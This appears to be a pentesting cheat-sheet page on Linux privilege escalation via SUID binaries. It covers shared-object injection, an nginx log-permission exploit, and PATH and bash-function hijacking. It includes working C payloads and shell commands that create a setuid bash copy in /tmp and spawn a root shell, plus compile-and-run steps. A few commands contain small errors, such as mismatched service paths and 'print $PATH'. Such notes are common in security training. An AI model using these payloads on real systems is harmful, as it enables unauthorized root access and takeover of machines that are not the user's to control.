SUID

Identify a non-common service

Use GTFO bins: https://gtfobins.github.io/

SHARED OBJECT INJECTION:

These files have a .so extension. They are mostly located in /lib/ or /usr/lib/. These are similar to DLL files in Windows. You will need to run non-common programs from SUID output to check if they have those files

Run the program and check what its doing. If you don't find much info then run strace. This will trace you through the whole application. Use another tool called strings to output only human readable strings. Check if there is any error called "No such file or directory". Grep through the output grep -i -E "open|access|no such file"

Then replace one of the files with malicious file.

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p ");
}

Make directory: mkdir /home/user/.config

Compile the program: gcc -shared -fPIC -o /home/user/.config/libcalc.so libcalc.c"

Run the program again to get root

BINARY SYMLINKS: nginxed-root.sh

This is a vuln in Nginx. The flaw is in the permissions of the logs created by nginx. Users can escalate from www-data to root. You might find this through LES. Check the version using: dpkg -l | grep nginx

This exploit takes advantage of SUID bit set to sudo. The log files are pressent at /var/log/nginx

We need to simulate a restart for the exploit to succeed. Run the exploit

ENVIRONMENT VARIABLES:

WITHOUT FULL PATH-

Check if any program is calling a command without the full path. You can exploit this command by creating a malicious file with the same name as that of the command and add it in Env variables.

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/command.c
#Compile the exploit
gcc /tmp/command.c -o /tmp/command
export PATH=/tmp:$PATH
print $PATH
#Run the SUID program

WITH FULL PATH-

If the program is calling the command with full path then you can try to exploit the function.

function /usr/sbin/service() { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/bin/service
#Run the SUID program
/usr/local/bin/suid-env2

PreviousSudoNextCapabilities

Last updated

Was this helpful?